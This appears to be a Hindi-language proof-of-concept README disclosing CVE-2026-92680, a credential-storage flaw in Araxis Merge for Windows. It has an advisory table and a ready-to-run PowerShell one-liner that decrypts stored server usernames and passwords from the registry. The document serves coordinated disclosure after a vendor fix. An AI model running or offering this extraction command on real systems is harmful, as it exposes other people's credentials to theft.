
Araxis Merge के DPAPI-संरक्षित सर्वर क्रेडेंशियल्स को डिक्रिप्ट करने वाला प्रूफ-ऑफ-कॉन्सेप्ट (CVE-2026-92680), जो Windows पर अपर्याप्त रूप से संरक्षित क्रेडेंशियल स्टोरेज को प्रदर्शित करता है।
Araxis Merge for Windows सर्वर क्रेडेंशियल्स को DPAPI के साथ संग्रहीत करता है, जिसमें pOptionalEntropy को NULL पर सेट किया जाता है। यह उसी उपयोगकर्ता संदर्भ में चलने वाले किसी भी कोड को उन्हें डिक्रिप्ट करने की अनुमति देता है।
पूरा विवरण: https://grepstrength.com/research/araxis-merge
| CVE | CVE-2026-92680 |
| CWE | CWE-522: अपर्याप्त रूप से संरक्षित क्रेडेंशियल्स |
| CVSS v3.1 | 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) |
| विक्रेता | Araxis Ltd. |
| प्रभावित | Araxis Merge for Windows 2011.4074 से 2026.0 तक |
| में ठीक किया गया | 2026.1 |
| विक्रेता सलाह | Merge-SA-26-00 |
| रिपोर्ट किया गया | 2026-08-18 |
| प्रकट किया गया | 2026-XX-XX |
| रिपोर्टर | grepStrength |
यह HKCU\Software\Araxis\Merge\7.1\Passwords को डिक्रिप्ट और पार्स करेगा। इसे उसी Windows उपयोगकर्ता के रूप में चलाया जाना चाहिए जिसने मूल रूप से क्रेडेंशियल्स को संग्रहीत किया था।
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize
सभी परीक्षण grepStength Security के स्वामित्व वाले सिस्टम्स पर केवल सिंथेटिक क्रेडेंशियल्स का उपयोग करके किए गए थे। यह Araxis Ltd. को रिपोर्ट किया गया था और समाधान उपलब्ध होने के बाद सार्वजनिक रूप से प्रकट किया गया था।
MIT